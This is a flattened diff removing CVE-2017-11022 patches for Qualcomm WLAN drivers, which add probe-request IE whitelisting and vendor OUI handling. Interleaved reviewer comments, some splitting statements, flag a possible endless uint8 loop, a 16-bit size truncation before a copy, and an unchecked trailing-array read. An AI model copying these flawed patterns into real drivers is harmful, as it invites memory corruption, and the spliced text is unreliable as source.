pvoui = (struct vendor_oui *)((uint8_t *)pno + sizeof(*pno)); -+ for (i = 0; i < cmd->num_vendor_oui; i++) { -+ WMITLV_SET_HDR(&voui[i].tlv_header, -+ WMITLV_TAG_STRUC_wmi_vendor_oui, -+ WMITLV_GET_STRUCT_TLVLEN( -+ wmi_vendor_oui)); -+ voui[i].oui_type_subtype = pvoui[i].oui_type | -+ (pvoui[i].oui_subtype << 24); -+ } -+ buf_ptr += cmd->num_vendor_oui * sizeof(wmi_vendor_oui); -+ } -+ - /* TODO: Discrete firmware doesn't have command/option to configure - * App IE which comes from wpa_supplicant as of part PNO start request. - */ -@@ -29358,13 +29447,17 @@ VOS_STATUS wma_scan_probe_setoui(tp_wma_handle wma, - uint32_t len; - u_int8_t *buf_ptr; - u_int32_t *oui_buf; -+ uint32_t i = 0; -+ wmi_vendor_oui *voui = NULL; -+ struct vendor_oui *pvoui = NULL; - - if (!wma || !wma->wmi_handle) { - WMA_LOGE("%s: WMA is closed, can not issue cmd", - __func__); - return VOS_STATUS_E_INVAL; - } -- len = sizeof(*cmd); -+ len = sizeof(*cmd) + WMI_TLV_HDR_SIZE + -+ psetoui->num_vendor_oui * sizeof(wmi_vendor_oui); - wmi_buf = wmi_buf_alloc(wma->wmi_handle, len); - if (!wmi_buf) { - WMA_LOGE("%s: wmi_buf_alloc failed", __func__); -@@ -29388,8 +29481,39 @@ VOS_STATUS wma_scan_probe_setoui(tp_wma_handle wma, - cmd->flags = WMI_SCAN_PROBE_OUI_SPOOFED_MAC_IN_PROBE_REQ; - if (psetoui->enb_probe_req_sno_randomization) - cmd->flags |= WMI_SCAN_PROBE_OUI_RANDOM_SEQ_NO_IN_PROBE_REQ; -+ -+ if (psetoui->ie_whitelist) -+ cmd->flags |= -+ WMI_SCAN_PROBE_OUI_ENABLE_IE_WHITELIST_IN_PROBE_REQ; -+ - WMA_LOGI(FL("vdev_id = %d, flags = %x"), cmd->vdev_id, cmd->flags); - -+ cmd->num_vendor_oui = psetoui->num_vendor_oui; -+ -+ if (psetoui->ie_whitelist) { -+ for (i = 0; i < PROBE_REQ_BITMAP_LEN; i++) -+ cmd->ie_bitmap[i] = psetoui->probe_req_ie_bitmap[i]; -+ } -+ -+ buf_ptr += sizeof(*cmd); -+ WMITLV_SET_HDR(buf_ptr, WMITLV_TAG_ARRAY_STRUC, -+ psetoui->num_vendor_oui * -+ sizeof(wmi_vendor_oui)); -+ -+ buf_ptr += WMI_TLV_HDR_SIZE; -+ if (cmd->num_vendor_oui != 0) { -+ voui = (wmi_vendor_oui *)buf_ptr; 
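Review bot: The OUI loop in wma_pno_start reuses `i`, which the function declares as `u_int8_t i;` (first hunk's context), to count up to `cmd->num_vendor_oui`. The type of that field is not shown in this diff, but if it is wider than 8 bits, as `uint32_t num_vendor_oui` is in tCsrScanRequest, a count above 255 keeps `i < cmd->num_vendor_oui` true forever and the loop never ends. wma_scan_probe_setoui adds its own `uint32_t i = 0;` for the same loop; I would use a separate `uint32_t` index here too, or reject counts above the supported maximum before sizing the buffer. The source entries are read from `(uint8_t *)pno + sizeof(*pno)`, so the caller must have allocated the trailing array; the function body continues outside the hunk.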
-+ pvoui = (struct vendor_oui *)((u_int8_t *)psetoui + -+ sizeof(*psetoui)); -+ for (i = 0; i < cmd->num_vendor_oui; i++) { -+ WMITLV_SET_HDR(&voui[i].tlv_header, -+ WMITLV_TAG_STRUC_wmi_vendor_oui, -+ WMITLV_GET_STRUCT_TLVLEN( -+ wmi_vendor_oui)); -+ voui[i].oui_type_subtype = pvoui[i].oui_type | -+ (pvoui[i].oui_subtype << 24); -+ } -+ } - - if (wmi_unified_cmd_send(wma->wmi_handle, wmi_buf, len, - WMI_SCAN_PROB_REQ_OUI_CMDID)) { -diff --git a/CORE/SME/inc/csrApi.h b/CORE/SME/inc/csrApi.h -index 5c03abe..a1606fe 100644 ---- a/CORE/SME/inc/csrApi.h -+++ b/CORE/SME/inc/csrApi.h -@@ -314,6 +314,10 @@ typedef struct tagCsrScanRequest - uint32_t enable_scan_randomization; - uint8_t mac_addr[VOS_MAC_ADDR_SIZE]; - uint8_t mac_addr_mask[VOS_MAC_ADDR_SIZE]; -+ bool ie_whitelist; -+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN]; -+ uint32_t num_vendor_oui; -+ struct vendor_oui *voui; - }tCsrScanRequest; - - typedef struct tagCsrBGScanRequest -diff --git a/CORE/SME/src/csr/csrApiScan.c b/CORE/SME/src/csr/csrApiScan.c -index 37e5a0f..65a8dc4 100644 ---- a/CORE/SME/src/csr/csrApiScan.c -+++ b/CORE/SME/src/csr/csrApiScan.c -@@ -5827,7 +5827,8 @@ eHalStatus csrSendMBScanReq( tpAniSirGlobal pMac, tANI_U16 sessionId, - - msgLen = (tANI_U16)(sizeof( tSirSmeScanReq ) - sizeof( pMsg->channelList.channelNumber ) + - ( sizeof( pMsg->channelList.channelNumber ) * pScanReq->ChannelInfo.numOfChannels )) + -- ( pScanReq->uIEFieldLen ) ; -+ ( pScanReq->uIEFieldLen ) + -+ pScanReq->num_vendor_oui * sizeof(struct vendor_oui); - - pMsg = vos_mem_malloc(msgLen); - if ( NULL == pMsg ) -@@ -5999,6 +6000,28 @@ eHalStatus csrSendMBScanReq( tpAniSirGlobal pMac, tANI_U16 sessionId, - vos_mem_copy(pMsg->mac_addr_mask, pScanReq->mac_addr_mask, - VOS_MAC_ADDR_SIZE); - } -+ -+ pMsg->ie_whitelist = pScanReq->ie_whitelist; -+ if (pMsg->ie_whitelist) -+ vos_mem_copy(pMsg->probe_req_ie_bitmap, -+ pScanReq->probe_req_ie_bitmap, -+ PROBE_REQ_BITMAP_LEN * sizeof(uint32_t)); -+ pMsg->num_vendor_oui = 
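Review bot: In csrSendMBScanReq the `(tANI_U16)` cast covers only the first parenthesised term, and the new `pScanReq->num_vendor_oui * sizeof(struct vendor_oui)` is added outside it, so the final width depends on `msgLen`, whose declaration is outside the hunk. If `msgLen` is 16 bits, as the cast suggests, a large enough count truncates the allocation size. The next hunk would still copy `pMsg->oui_field_len` bytes to `pMsg + pMsg->oui_field_offset`, and that length is computed from the untruncated count. I would compute the total in a `uint32_t`, fail the request when it does not fit in `msgLen`, and only then allocate.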
pScanReq->num_vendor_oui; -+ pMsg->oui_field_len = pScanReq->num_vendor_oui * -+ sizeof(struct vendor_oui); -+ pMsg->oui_field_offset = (tANI_U16)(sizeof( tSirSmeScanReq ) - -+ sizeof( pMsg->channelList.channelNumber ) + -+ (sizeof( pMsg->channelList.channelNumber ) * -+ pScanReq->ChannelInfo.numOfChannels )) + -+ pScanReq->uIEFieldLen; -+ -+ if (pScanReq->num_vendor_oui != 0) -+ { -+ vos_mem_copy((tANI_U8 *)pMsg + pMsg->oui_field_offset, -+ (uint8_t*)(pScanReq->voui), -+ pMsg->oui_field_len); -+ } -+ - }while(0); - smsLog(pMac, LOG1, FL("domainIdCurrent %s (%d) scanType %s (%d)" - "bssType %s (%d), requestType %s(%d)" -@@ -6479,6 +6502,7 @@ eHalStatus csrScanCopyRequest(tpAniSirGlobal pMac, tCsrScanRequest *pDstReq, tCs - pDstReq->pIEField = NULL; - pDstReq->ChannelInfo.ChannelList = NULL; - pDstReq->SSIDs.SSIDList = NULL; -+ pDstReq->voui = NULL; - - if(pSrcReq->uIEFieldLen == 0) - { -@@ -6721,6 +6745,35 @@ eHalStatus csrScanCopyRequest(tpAniSirGlobal pMac, tCsrScanRequest *pDstReq, tCs - pDstReq->p2pSearch = pSrcReq->p2pSearch; - pDstReq->skipDfsChnlInP2pSearch = pSrcReq->skipDfsChnlInP2pSearch; - -+ if (pSrcReq->num_vendor_oui == 0) -+ { -+ pDstReq->num_vendor_oui = 0; -+ pDstReq->voui = NULL; -+ } -+ else -+ { -+ pDstReq->voui = vos_mem_malloc(pSrcReq->num_vendor_oui * -+ sizeof(*pDstReq->voui)); -+ if (NULL == pDstReq->voui) -+ status = eHAL_STATUS_FAILURE; -+ else -+ status = eHAL_STATUS_SUCCESS; -+ -+ if (HAL_STATUS_SUCCESS(status)) -+ { -+ pDstReq->num_vendor_oui = pSrcReq->num_vendor_oui; -+ vos_mem_copy(pDstReq->voui, -+ pSrcReq->voui, -+ pSrcReq->num_vendor_oui * -+ sizeof(*pDstReq->voui)); -+ } -+ else -+ { -+ pDstReq->num_vendor_oui = 0; -+ smsLog(pMac, LOGE, FL("No memory for voui")); -+ break; -+ } -+ } - } - }while(0); - -@@ -6755,6 +6808,13 @@ eHalStatus csrScanFreeRequest(tpAniSirGlobal pMac, tCsrScanRequest *pReq) - } - pReq->SSIDs.numOfSSIDs = 0; - -+ if(pReq->voui) -+ { -+ vos_mem_free(pReq->voui); -+ pReq->voui = NULL; -+ } -+ 
pReq->num_vendor_oui = 0; -+ - return eHAL_STATUS_SUCCESS; - } - -diff --git a/CORE/SME/src/pmc/pmcApi.c b/CORE/SME/src/pmc/pmcApi.c -index c1f7653..45313c1 100644 ---- a/CORE/SME/src/pmc/pmcApi.c -+++ b/CORE/SME/src/pmc/pmcApi.c -@@ -2867,14 +2867,17 @@ eHalStatus pmcSetPreferredNetworkList - return eHAL_STATUS_FAILURE; - } - -- pRequestBuf = vos_mem_malloc(sizeof(tSirPNOScanReq)); -+ pRequestBuf = vos_mem_malloc(sizeof(tSirPNOScanReq) + -+ (pRequest->num_vendor_oui) * -+ (sizeof(struct vendor_oui))); - if (NULL == pRequestBuf) - { - VOS_TRACE(VOS_MODULE_ID_SME, VOS_TRACE_LEVEL_ERROR, "%s: Not able to allocate memory for PNO request", __func__); - return eHAL_STATUS_FAILED_ALLOC; - } - -- vos_mem_copy(pRequestBuf, pRequest, sizeof(tSirPNOScanReq)); -+ vos_mem_copy(pRequestBuf, pRequest, sizeof(tSirPNOScanReq) + -+ (pRequest->num_vendor_oui) * (sizeof(struct vendor_oui))); - - /*Must translate the mode first*/ - ucDot11Mode = (tANI_U8) csrTranslateToWNICfgDot11Mode(pMac, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-11022/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-11022/qcacld-3.0/0002.patch deleted file mode 100644 index c599bbff..00000000 --- a/Patches/Linux_CVEs/CVE-2017-11022/qcacld-3.0/0002.patch +++ /dev/null 
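Review bot: pmcSetPreferredNetworkList now reads `sizeof(tSirPNOScanReq) + num_vendor_oui * sizeof(struct vendor_oui)` bytes from `pRequest`, which is valid only if every caller allocated the request with that trailing array. Nothing in the hunk states or checks this, and the function's signature and callers are outside it. I would document the contract at the copy, e.g. `/* pRequest must be followed by num_vendor_oui struct vendor_oui entries */`. I would also compute the size once into a local so the allocation and the copy cannot drift apart.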
@@ -1,1297 +0,0 @@ -From f41e3dbc92d448d3d56cae5517e41a4bafafdf3f Mon Sep 17 00:00:00 2001 -From: Rajeev Kumar Sirasanagandla -Date: Tue, 3 Jan 2017 00:22:10 +0530 -Subject: qcacld-3.0: Add support to include selective scan IEs only - -qcacld-2.0 to qcacld-3.0 propagation - -Add support to include only selective IEs in probe requests in -order to improve user's privacy. - -Change-Id: Ib874af7ec2f5453282ffe0e8fc2e50934460b745 -CRs-Fixed: 1086582 ---- - core/hdd/inc/wlan_hdd_cfg.h | 313 +++++++++++++++++++++ - core/hdd/inc/wlan_hdd_main.h | 5 + - core/hdd/src/wlan_hdd_cfg.c | 283 ++++++++++++++++++- - core/hdd/src/wlan_hdd_cfg80211.c | 14 +- - core/hdd/src/wlan_hdd_main.c | 18 ++ - core/hdd/src/wlan_hdd_power.c | 2 + - core/hdd/src/wlan_hdd_scan.c | 76 ++++- - core/hdd/src/wlan_hdd_scan.h | 21 +- - core/mac/inc/sir_api.h | 35 ++- - core/mac/src/pe/lim/lim_process_sme_req_messages.c | 24 +- - core/sme/inc/csr_api.h | 6 + - core/sme/src/common/sme_power_save.c | 9 +- - core/sme/src/csr/csr_api_scan.c | 53 +++- - core/wma/src/wma_scan_roam.c | 36 +++ - 14 files changed, 880 insertions(+), 15 deletions(-) - -diff --git a/core/hdd/inc/wlan_hdd_cfg.h b/core/hdd/inc/wlan_hdd_cfg.h -index 92c8669..d2cb3be 100644 ---- a/core/hdd/inc/wlan_hdd_cfg.h -+++ b/core/hdd/inc/wlan_hdd_cfg.h -@@ -61,6 +61,8 @@ - - /* Number of items that can be configured */ - #define MAX_CFG_INI_ITEMS 1024 -+#define MAX_PRB_REQ_VENDOR_OUI_INI_LEN 160 -+#define VENDOR_SPECIFIC_IE_BITMAP 0x20000000 - - /* Defines for all of the things we read from the configuration (registry). */ - -@@ -10049,6 +10051,261 @@ enum dot11p_mode { - #define CFG_ARP_AC_CATEGORY_MAX (3) - #define CFG_ARP_AC_CATEGORY_DEFAULT (3) - -+ -+/* -+ * -+ * g_enable_probereq_whitelist_ies - Enable IE white listing -+ * @Min: 0 -+ * @Max: 1 -+ * @Default: 0 -+ * -+ * This ini is used to enable/disable probe request IE white listing feature. 
-+ * Values 0 and 1 are used to disable and enable respectively, by default this
-+ * feature is disabled.
-+ *
-+ * Related: None
-+ *
-+ * Supported Feature: Probe request IE whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ *
-+ */
-+#define CFG_PRB_REQ_IE_WHITELIST_NAME "g_enable_probereq_whitelist_ies"
-+#define CFG_PRB_REQ_IE_WHITELIST_MIN (0)
-+#define CFG_PRB_REQ_IE_WHITELIST_MAX (1)
-+#define CFG_PRB_REQ_IE_WHITELIST_DEFAULT (0)
-+
-+/*
-+ * For IE white listing in Probe Req, following ini parameters from
-+ * g_probe_req_ie_bitmap_0 to g_probe_req_ie_bitmap_7 are used. User needs to
-+ * input this values in hexa decimal format, when bit is set in bitmap,
-+ * corresponding IE needs to be included in probe request.
-+ *
-+ * Example:
-+ * ========
-+ * If IE 221 needs to be in the probe request, set the corresponding bit
-+ * as follows:
-+ * a= IE/32 = 221/32 = 6 = g_probe_req_ie_bitmap_6
-+ * b = IE modulo 32 = 29,
-+ * means set the bth bit in g_probe_req_ie_bitmap_a,
-+ * therefore set 29th bit in g_probe_req_ie_bitmap_6,
-+ * as a result, g_probe_req_ie_bitmap_6=20000000
-+ *
-+ * Note: For IE 221, its mandatory to set the gProbeReqOUIs.
-+ */
-+
-+/*
-+ *
-+ * g_probe_req_ie_bitmap_0 - Used to set the bitmap of IEs from 0 to 31
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 0 to 31 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ *
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP0_NAME "g_probe_req_ie_bitmap_0"
-+#define CFG_PRB_REQ_IE_BIT_MAP0_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP0_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP0_DEFAULT (0x00000000)
-+
-+/*
-+ *
-+ * g_probe_req_ie_bitmap_1 - Used to set the bitmap of IEs from 32 to 63
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 32 to 63 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ *
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP1_NAME "g_probe_req_ie_bitmap_1"
-+#define CFG_PRB_REQ_IE_BIT_MAP1_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP1_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP1_DEFAULT (0x00000000)
-+
-+/*
-+ *
-+ * g_probe_req_ie_bitmap_2 - Used to set the bitmap of IEs from 64 to 95
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 64 to 95 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ *
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP2_NAME "g_probe_req_ie_bitmap_2"
-+#define CFG_PRB_REQ_IE_BIT_MAP2_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP2_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP2_DEFAULT (0x00000000)
-+
-+/*
-+ *
-+ * g_probe_req_ie_bitmap_3 - Used to set the bitmap of IEs from 96 to 127
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 96 to 127 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ *
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP3_NAME "g_probe_req_ie_bitmap_3"
-+#define CFG_PRB_REQ_IE_BIT_MAP3_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP3_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP3_DEFAULT (0x00000000)
-+
-+/*
-+ *
-+ * g_probe_req_ie_bitmap_4 - Used to set the bitmap of IEs from 128 to 159
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 128 to 159 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ *
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP4_NAME "g_probe_req_ie_bitmap_4"
-+#define CFG_PRB_REQ_IE_BIT_MAP4_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP4_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP4_DEFAULT (0x00000000)
-+
-+/*
-+ *
-+ * g_probe_req_ie_bitmap_5 - Used to set the bitmap of IEs from 160 to 191
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 160 to 191 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ *
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP5_NAME "g_probe_req_ie_bitmap_5"
-+#define CFG_PRB_REQ_IE_BIT_MAP5_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP5_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP5_DEFAULT (0x00000000)
-+
-+/*
-+ *
-+ * g_probe_req_ie_bitmap_6 - Used to set the bitmap of IEs from 192 to 223
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 192 to 223 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ *
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP6_NAME "g_probe_req_ie_bitmap_6"
-+#define CFG_PRB_REQ_IE_BIT_MAP6_MIN (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP6_MAX (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP6_DEFAULT (0x00000000)
-+
-+/*
-+ *
-+ * g_probe_req_ie_bitmap_7 - Used to set the bitmap of IEs from 224 to 255
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 224 to 255 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ * -+ * Supported Feature: Probe request ie whitelisting -+ * -+ * Usage: Internal/External -+ * -+ * -+ */ -+#define CFG_PRB_REQ_IE_BIT_MAP7_NAME "g_probe_req_ie_bitmap_7" -+#define CFG_PRB_REQ_IE_BIT_MAP7_MIN (0x00000000) -+#define CFG_PRB_REQ_IE_BIT_MAP7_MAX (0xFFFFFFFF) -+#define CFG_PRB_REQ_IE_BIT_MAP7_DEFAULT (0x00000000) -+ -+/* -+ * For vendor specific IE, Probe Req OUI types and sub types which are -+ * to be white listed are specified in gProbeReqOUIs in the following -+ * example format - gProbeReqOUIs=AABBCCDD EEFF1122 -+ */ -+ -+/* -+ * -+ * gProbeReqOUIs - Used to specify vendor specific OUIs -+ * @Default: Empty string -+ * -+ * This ini is used to include the specified OUIs in vendor specific IE -+ * of probe request. -+ * -+ * Related: Need to enable g_enable_probereq_whitelist_ies and -+ * vendor specific IE should be set in g_probe_req_ie_bitmap_6. -+ * -+ * Supported Feature: Probe request ie whitelisting -+ * -+ * Usage: Internal/External -+ * -+ * -+ */ -+#define CFG_PROBE_REQ_OUI_NAME "gProbeReqOUIs" -+#define CFG_PROBE_REQ_OUI_DEFAULT "" -+ -+ - /*--------------------------------------------------------------------------- - Type declarations - -------------------------------------------------------------------------*/ -@@ -10779,6 +11036,20 @@ struct hdd_config { - - uint8_t packet_filters_bitmap; - uint32_t arp_ac_category; -+ -+ bool probe_req_ie_whitelist; -+ /* probe request bit map ies */ -+ uint32_t probe_req_ie_bitmap_0; -+ uint32_t probe_req_ie_bitmap_1; -+ uint32_t probe_req_ie_bitmap_2; -+ uint32_t probe_req_ie_bitmap_3; -+ uint32_t probe_req_ie_bitmap_4; -+ uint32_t probe_req_ie_bitmap_5; -+ uint32_t probe_req_ie_bitmap_6; -+ uint32_t probe_req_ie_bitmap_7; -+ -+ /* Probe Request multiple vendor OUIs */ -+ uint8_t probe_req_ouis[MAX_PRB_REQ_VENDOR_OUI_INI_LEN]; - }; - - #define VAR_OFFSET(_Struct, _Var) (offsetof(_Struct, _Var)) -@@ -10891,6 +11162,48 @@ static __inline unsigned long util_min(unsigned long a, unsigned long b) - 
- /* Function declarations and documenation */ - QDF_STATUS hdd_parse_config_ini(hdd_context_t *pHddCtx); -+ -+/** -+ * hdd_validate_prb_req_ie_bitmap - validates user input for ie bit map -+ * @hdd_ctx: the pointer to hdd context -+ * -+ * This function checks whether user has entered valid probe request -+ * ie bitmap and also verifies vendor ouis if vendor specific ie is set -+ * -+ * Return: status of verification -+ * true - valid input -+ * false - invalid input -+ */ -+bool hdd_validate_prb_req_ie_bitmap(hdd_context_t *hdd_ctx); -+ -+/** -+ * hdd_parse_probe_req_ouis - form ouis from ini gProbeReqOUIs -+ * @hdd_ctx: the pointer to hdd context -+ * -+ * This function parses the ini string gProbeReqOUIs which needs be to in the -+ * following format: -+ * "<8 characters of [0-9] or [A-F]>space<8 characters from [0-9] etc.," -+ * example: "AABBCCDD 1122EEFF" -+ * and the logic counts the number of OUIS and allocates the memory -+ * for every valid OUI and is stored in hdd_context_t -+ * -+ * Return: status of parsing -+ * 0 - success -+ * negative value - failure -+ */ -+int hdd_parse_probe_req_ouis(hdd_context_t *hdd_ctx); -+ -+/** -+ * hdd_free_probe_req_ouis - de-allocates the probe req ouis -+ * @hdd_ctx: the pointer to hdd context -+ * -+ * This function de-alloactes the probe req ouis which are -+ * allocated while parsing of ini string gProbeReqOUIs -+ * -+ * Return: None -+ */ -+void hdd_free_probe_req_ouis(hdd_context_t *hdd_ctx); -+ - QDF_STATUS hdd_update_mac_config(hdd_context_t *pHddCtx); - QDF_STATUS hdd_set_sme_config(hdd_context_t *pHddCtx); - QDF_STATUS hdd_set_sme_chan_list(hdd_context_t *hdd_ctx); -diff --git a/core/hdd/inc/wlan_hdd_main.h b/core/hdd/inc/wlan_hdd_main.h -index d0d0531..38522ea 100644 ---- a/core/hdd/inc/wlan_hdd_main.h -+++ b/core/hdd/inc/wlan_hdd_main.h -@@ -285,6 +285,8 @@ typedef enum { - eHDD_SAP_EAPOL_IN_PROGRESS, - } scan_reject_states; - -+#define MAX_PROBE_REQ_OUIS 16 -+ - /* - * Generic asynchronous request/response 
support - * -@@ -1658,6 +1660,9 @@ struct hdd_context_s { - bool rcpi_enabled; - bool imps_enabled; - int user_configured_pkt_filter_rules; -+ -+ uint32_t no_of_probe_req_ouis; -+ struct vendor_oui *probe_req_voui; - }; - - /*--------------------------------------------------------------------------- -diff --git a/core/hdd/src/wlan_hdd_cfg.c b/core/hdd/src/wlan_hdd_cfg.c -index 0ab8662..72a1647 100644 ---- a/core/hdd/src/wlan_hdd_cfg.c -+++ b/core/hdd/src/wlan_hdd_cfg.c -@@ -4408,6 +4408,74 @@ REG_TABLE_ENTRY g_registry_table[] = { - CFG_ARP_AC_CATEGORY_DEFAULT, - CFG_ARP_AC_CATEGORY_MIN, - CFG_ARP_AC_CATEGORY_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_WHITELIST_NAME, WLAN_PARAM_Integer, -+ struct hdd_config, probe_req_ie_whitelist, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_WHITELIST_DEFAULT, -+ CFG_PRB_REQ_IE_WHITELIST_MIN, -+ CFG_PRB_REQ_IE_WHITELIST_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP0_NAME, WLAN_PARAM_HexInteger, -+ struct hdd_config, probe_req_ie_bitmap_0, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP0_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP0_MIN, -+ CFG_PRB_REQ_IE_BIT_MAP0_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP1_NAME, WLAN_PARAM_HexInteger, -+ struct hdd_config, probe_req_ie_bitmap_1, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP1_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP1_MIN, -+ CFG_PRB_REQ_IE_BIT_MAP1_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP2_NAME, WLAN_PARAM_HexInteger, -+ struct hdd_config, probe_req_ie_bitmap_2, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP2_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP2_MIN, -+ CFG_PRB_REQ_IE_BIT_MAP2_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP3_NAME, WLAN_PARAM_HexInteger, -+ struct hdd_config, probe_req_ie_bitmap_3, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP3_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP3_MIN, -+ 
CFG_PRB_REQ_IE_BIT_MAP3_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP4_NAME, WLAN_PARAM_HexInteger, -+ struct hdd_config, probe_req_ie_bitmap_4, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP4_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP4_MIN, -+ CFG_PRB_REQ_IE_BIT_MAP4_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP5_NAME, WLAN_PARAM_HexInteger, -+ struct hdd_config, probe_req_ie_bitmap_5, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP5_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP5_MIN, -+ CFG_PRB_REQ_IE_BIT_MAP5_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP6_NAME, WLAN_PARAM_HexInteger, -+ struct hdd_config, probe_req_ie_bitmap_6, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP6_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP6_MIN, -+ CFG_PRB_REQ_IE_BIT_MAP6_MAX), -+ -+ REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP7_NAME, WLAN_PARAM_HexInteger, -+ struct hdd_config, probe_req_ie_bitmap_7, -+ VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP7_DEFAULT, -+ CFG_PRB_REQ_IE_BIT_MAP7_MIN, -+ CFG_PRB_REQ_IE_BIT_MAP7_MAX), -+ -+ 